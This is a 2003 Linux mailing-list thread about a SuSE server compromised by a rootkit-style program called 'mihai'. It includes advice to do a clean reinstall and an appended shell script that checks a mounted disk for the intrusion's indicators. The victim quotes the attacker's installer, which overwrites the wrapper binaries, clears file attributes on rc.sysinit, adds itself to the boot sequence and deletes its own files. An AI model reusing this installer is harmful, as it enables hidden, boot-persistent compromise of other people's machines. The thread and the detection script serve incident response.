On Friday 13 June 2003 15:18, Peter Gloor wrote:
Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarily deactivated.
At 2 PM somebody from outside managed to implant a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was overwritten (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai.
I'm not sure but it looks like other files have been affected as well (sendmail has gotten a date of tonight and is much larger than the original sendmail).
Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper.
Now, the server will no longer boot. After mounting the file systems (reiserfs) the following message appears:
mounting local filesystems
proc on /proc type proc (rw)
Then the server hangs. How can I get the server up again?
It doesn't matter to me if I have to reinstall all software as long as I don't need to destroy my partitions and, more importantly, the file system on hda3, since I have a backup of all important config files and all datafiles on hda3.
I would move all the data off the machine and reformat everything by doing a clean install. Only way to be sure (see Hicks' conversation with Ripley, Aliens). Then check the data out and move it back onto the disk once you're confident there's nothing in the data files that could have been planted by the nasties. I don't fancy any of the other 'partial' reinstalls at all, because you'd never be certain ...

HTH
Fergus
I tried to reinstall from CD, but this doesn't work either (options freely translated from German):
- New Install: will create new partitions and overwrite my HD!?!
- Update existing system: does not boot (same as normal boot from disk)
- Start installed system: does not boot (same as normal boot from disk)
What can I do? Any hints are welcome.
This is how /mihai/inst looks:
---------------------------------------------------------------
#/bin/bash
echo "Start Daemon"
sleep 1
./kill
# copies the binary over both wrapper paths
cp -f mihai /usr/bin/wrapper
cp -f mihai /usr/sbin/wrapper
sleep 1
wrapper
# clears all file attributes so rc.sysinit can be appended to
chattr -AacdisSu /etc/rc.d/rc.sysinit
echo >>/etc/rc.d/rc.sysinit "#Start Wrapper"
echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1
# removes its own installer files
rm -rf mihai.tgz
rm -rf mihai
echo "Done"
---------------------------------------------------------------
Does anybody know this virus?
Peter
-- 
Fergus Wilde
Chetham's Library
Long Millgate
Manchester M3 1SB
Tel: +44 161 834 7961
Fax: +44 161 839 5797
http://www.chethams.org.uk
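An added check, not part of this thread, that a responder could run from rescue media against the compromised disk mounted read-only (e.g. at /mnt) to look for the indicators Peter lists: the /mihai files, the two wrapper binaries, and the lines the installer appends to rc.sysinit. The paths are taken from the post; the mount point and the function name are assumptions.

```shell
#!/bin/sh
# Offline triage of a mounted root for the indicators described in the thread.
# Usage: check_mihai_root /mnt   (exit status 0 = nothing found, 1 = findings)
# Assumption: the suspect filesystem is mounted at the path given as $1.

check_mihai_root() {
    root="${1%/}"            # strip a trailing slash from the mount point
    findings=0

    # files and directories the installer leaves or overwrites
    for p in /mihai /.mihai /mihai.tgz /usr/bin/wrapper /usr/sbin/wrapper; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            findings=$((findings + 1))
        fi
    done

    # the installer appends "#Start Wrapper" and "wrapper" to rc.sysinit
    sysinit="$root/etc/rc.d/rc.sysinit"
    if [ -f "$sysinit" ] && grep -q -e '^#Start Wrapper' -e '^wrapper$' "$sysinit"; then
        echo "FOUND: wrapper hook in $sysinit"
        findings=$((findings + 1))
    fi

    # the installer ran chattr on rc.sysinit; show its current attributes
    # (lsattr only works on filesystems that support attributes, so errors are ignored)
    if [ -f "$sysinit" ] && command -v lsattr >/dev/null 2>&1; then
        lsattr "$sysinit" 2>/dev/null | sed 's/^/ATTR: /'
    fi

    echo "findings=$findings"
    [ "$findings" -eq 0 ]
}
```

Because sendmail and other binaries may also have been replaced, follow this with a package verification of the mounted root (`rpm --root /mnt -Va`) before trusting anything on the disk.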